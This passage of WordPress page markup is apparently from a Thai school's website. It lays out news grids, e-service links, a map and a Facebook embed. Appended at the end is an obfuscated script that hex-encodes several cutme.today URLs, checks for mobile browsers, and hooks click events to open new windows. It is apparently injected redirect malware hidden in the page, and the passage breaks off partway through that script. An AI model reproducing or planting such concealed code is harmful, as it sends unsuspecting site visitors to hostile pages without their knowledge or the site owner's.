{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt 